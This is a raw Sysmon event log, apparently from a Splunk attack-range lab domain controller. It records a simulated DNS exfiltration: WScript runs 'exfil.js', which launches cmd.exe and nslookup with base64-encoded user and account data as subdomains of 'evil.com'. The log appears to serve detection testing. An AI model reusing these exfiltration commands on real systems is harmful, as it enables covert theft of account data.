M32\ntdll.dll+51791 10341000x8000000000000000197949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-17A1-629A-783D-000000005F02}55525432C:\Windows\System32\WScript.exe{2E1864BB-17B7-629A-6F3F-000000005F02}5792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.238{2E1864BB-17B7-629A-6F3F-000000005F02}5792C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.227{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyfum.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.194{2E1864BB-17B7-629A-6C3F-000000005F02}75481488C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-6E3F-000000005F02}6028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.193{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.193{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.193{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.192{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.173{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-6E3F-000000005F02}6028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.173{2E1864BB-17B7-629A-6B3F-000000005F02}12924468C:\Windows\system32\cmd.exe{2E1864BB-17B7-629A-6E3F-000000005F02}6028C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.187{2E1864BB-17B7-629A-6E3F-000000005F02}6028C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B7-629A-6B3F-000000005F02}1292C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwyfum.tmp 2>&1 23542300x8000000000000000197937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.173{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5DE63852A0741520A8E61DA00203C19,SHA256=E48B544BF81FBA430E120D32FB94FF0C91972B1703BE354CDB0DA711455AB2DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000197936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.158{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20BAF346FEA25B35ADB8AF4616D8476A,SHA256=BD6702E079FF9924DE98B7121E1871946A6244AC0CB9F2D2DA76BB4C71F6BEC6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.158{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-6D3F-000000005F02}7356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-6D3F-000000005F02}7356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17B7-629A-6D3F-000000005F02}7356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-6C3F-000000005F02}7548C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.144{2E1864BB-17B7-629A-6D3F-000000005F02}7356C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000197926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.142{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B7-629A-6C3F-000000005F02}7548C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000197925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.424{00000000-0000-0000-0000-000000000000}5216<unknown process>-udpfalsefalse127.0.0.1-52465-false127.0.0.1-53domain 354300x8000000000000000197924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{00000000-0000-0000-0000-000000000000}5216<unknown process>-udptruefalse127.0.0.1-52464-false127.0.0.1-53domain 354300x8000000000000000197923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{00000000-0000-0000-0000-000000000000}5216<unknown process>-udpfalsefalse127.0.0.1-52463-false127.0.0.1-53domain 354300x8000000000000000197922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{00000000-0000-0000-0000-000000000000}5216<unknown process>-udptruefalse127.0.0.1-52463-false127.0.0.1-53domain 354300x8000000000000000197921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.338{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-52462-false127.0.0.1-53domain 354300x8000000000000000197920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.338{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-52462-false127.0.0.1-53domain 354300x8000000000000000197919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.337{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-52461-false127.0.0.1-53domain 354300x8000000000000000197918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.337{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-52461-false127.0.0.1-53domain 354300x8000000000000000197917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.337{00000000-0000-0000-0000-000000000000}2792<unknown process>-udpfalsefalse127.0.0.1-52460-false127.0.0.1-53domain 354300x8000000000000000197916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.337{00000000-0000-0000-0000-000000000000}2792<unknown process>-udptruefalse127.0.0.1-52460-false127.0.0.1-53domain 354300x8000000000000000197915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.175{00000000-0000-0000-0000-000000000000}7672<unknown process>-udpfalsefalse127.0.0.1-52458-false127.0.0.1-53domain 354300x8000000000000000197914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{00000000-0000-0000-0000-000000000000}7672<unknown process>-udpfalsefalse127.0.0.1-52457-false127.0.0.1-53domain 354300x8000000000000000197913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{00000000-0000-0000-0000-000000000000}7672<unknown process>-udptruefalse127.0.0.1-52457-false127.0.0.1-53domain 354300x8000000000000000197912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{00000000-0000-0000-0000-000000000000}7672<unknown process>-udpfalsefalse127.0.0.1-52456-false127.0.0.1-53domain 354300x8000000000000000197911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.068{00000000-0000-0000-0000-000000000000}8008<unknown process>-udptruefalse127.0.0.1-52453-false127.0.0.1-53domain 354300x8000000000000000197910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.993{00000000-0000-0000-0000-000000000000}1096<unknown process>-udptruefalse127.0.0.1-52450-false127.0.0.1-53domain 10341000x8000000000000000197909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.126{2E1864BB-17B7-629A-6C3F-000000005F02}75481488C:\Windows\system32\conhost.exe{2E1864BB-17B7-629A-6B3F-000000005F02}1292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.111{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-6C3F-000000005F02}7548C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.111{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B7-629A-6B3F-000000005F02}1292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 